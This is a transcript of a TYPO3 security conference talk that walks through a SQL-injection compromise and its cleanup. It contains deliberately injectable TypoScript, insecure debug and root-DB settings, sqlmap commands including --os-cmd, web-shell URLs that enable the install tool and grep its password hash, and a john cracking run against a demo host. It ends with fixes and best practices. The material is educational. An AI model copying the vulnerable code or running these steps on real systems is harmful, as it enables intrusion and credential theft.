diary of a hack
TRANSCRIPT
Inspiring people to
shareDiary of a Hack
Vulnerabilities and Attacks
Diary of a Hack
Helmut Hummel <[email protected]>
22.04.2016
Vulnerabilities and Exploits
1
2
@helhum
Security
3
4
http://typotic.com/uploads/posts/3427/funny-dude-this-is-boring-01.jpg
5
http://www.pxleyes.com/images/contests/teddy-bears-2/fullsize/Story-time-507bf54d589a1_hires.jpg
6
http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif
7
http://www.value-scope.com/wp-content/uploads/bug_vs_feature.gif
8
http://i.telegraph.co.uk/multimedia/archive/02210/squirrel_2210134b.jpg
9
https://xkcd.com/327/
10
http://www.kitploit.com/2013/06/john-ripper-v180-fast-password-cracker.html
11
https://ilifejourney.files.wordpress.com/2011/11/spaghetti-mess.jpg
12
http://img3.wikia.nocookie.net/__cb20121122132016/villains/images/f/fb/Janitor_2.jpg
13
http://i.livescience.com/images/i/000/029/390/i02/shutterstock_105432542.jpg?1343404330
14
Diary of a Hack
15
Diary of a Hack
Day 1 - Implementing a feature
16
Diary of a Hack
17
lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where.wrap = colPos=| select.where.data = GP:colPos }
Diary of a Hack
18
lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where.wrap = header like '%|%' select.where.data = GP:search }
Diary of a Hack
Day 2 - Testing the feature
19
Diary of a Hack
20
Diary of a Hack
21
'BE/debug' => '1''FE/debug' => '1''SYS/devIPmask' => '*''SYS/displayErrors' => '1''SYS/sqlDebug' => '1''SYS/exceptionalErrors' => '28674'
Diary of a Hack
22
Diary of a Hack
23
'DB/username' => 'root'
Diary of a Hack
24
Diary of a Hack
Day 3 - Distraction
25
Diary of a Hack
26
Diary of a Hack
Day 4 - Attraction
27
Diary of a Hack
28
https://www.google.de/?q=exec_SELECTquery+%22You+have+an+error+in+your+SQL+syntax%22
Diary of a Hack
Day 5 - Exploitation
29
Inspiring people to
shareDiary of a Hack
Vulnerabilities and Attacks
Excursion - SQLi
30
Excursion - SQLi
31
SELECT * FROM tt_content WHERE colPos = 0
32
'SELECT * FROM tt_content WHERE colPos = ' . $_GET['colPos']
Excursion - SQLi
33
Excursion - SQLi
34
'SELECT * FROM tt_content WHERE colPos = ' . $_GET['colPos']
Excursion - SQLi
35
'SELECT * FROM tt_content WHERE colPos = 0 or hidden = 1'
$_GET['colPos']
Excursion - SQLi
Disclaimer
36
Don’t do this at home!
37
(unless you have written permit)
38
Diary of a Hack
39
$ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos'!GET parameter 'colPos' is vulnerable. Do you want to keep testing the others? [y/N] sqlmap identified the following injection points with a total of 30 HTTP(s) requests:
Inspiring people to
shareDiary of a Hack
Vulnerabilities and Attacks
The power of MySQL
40
Diary of a Hack
41
$ sqlmap -u 'http://security.dev/index.php?id=37&colPos=0' -p 'colPos' \ —os-cmd='ls -al'
Diary of a Hack
42
Diary of a Hack
43
http://security.dev/tmpbrsru.php?cmd=touch%20typo3conf/ENABLE_INSTALL_TOOL!http://security.dev/typo3/sysext/install/Start/Install.php!http://security.dev/tmpbrsru.php?cmd=grep%20installToolPassword%20typo3conf/LocalConfiguration.php
Diary of a Hack
44
$ john pwLoaded 1 password hash (phpass MD5 [128/128 SSE2 intrinsics 4x4x5])password (dummy)guesses: 1 time: 0:00:00:01 DONE (Thu Jun 4 11:00:44 2015) c/s: 900 trying: 123456 - fishing
Diary of a Hack
45
Diary of a Hack
Day 5 - Discovery
46
Diary of a Hack
Discovery• Take site offline!
• seriously
• I mean it
47
48
Diary of a Hack
Day 6 - Analysis
49
Diary of a Hack
Analysis• Make a backup of current state (files, DB, logs)
• Search all logs for „suspicious“ entries
• Find point of entry (security issue)
• If in doubt: get help
50
Diary of a Hack
Day 7 - Fix
51
Diary of a Hack
52
lib.sqliSimple = CONTENT lib.sqliSimple { table = tt_content select.where = colPos=###colPos### select.markers { colPos.data = GP:colPos } }
Diary of a Hack
53
lib.sqliSearch = CONTENT lib.sqliSearch { table = tt_content select.where = header like ###search### select.markers { search.data = GP:search search.wrap = %|% } }
Diary of a Hack
Fix• Close security issue in Code/ Extension/ Core
• Restore from backup
• Or if you really know what you are doing: cleanup installation
• Go online again
• Plan improvements (education, monitoring, …)
54
Diary of a Hack
Day 8 - Improve
55
Inspiring people to
shareSecurity of Web Applications
Vulnerabilities and Attacks
Topictext
Lessons learned• Development/ Testing Environment
• Deploy to Production
• Least privilege
• There is no Software without bugs. Be prepared!
56
Diary of a Hack
Best Practice• Operations
• Regular updates
• Backups
• Monitoring
• Development
• Peer Reviews (TypoScript, Code, Templates)
• (automated) Tests
• Focus
• Education
• Allocate time for all of the above
57
Questions?
58
Inspiring people to
shareSecurity of Web Applications
Vulnerabilities and Attacks
Diary of a Hack
Resources• http://docs.typo3.org/typo3cms/SecurityGuide/
• http://sqlmap.org
• http://www.openwall.com/john/
• https://www.owasp.org/
59
Thank you!
60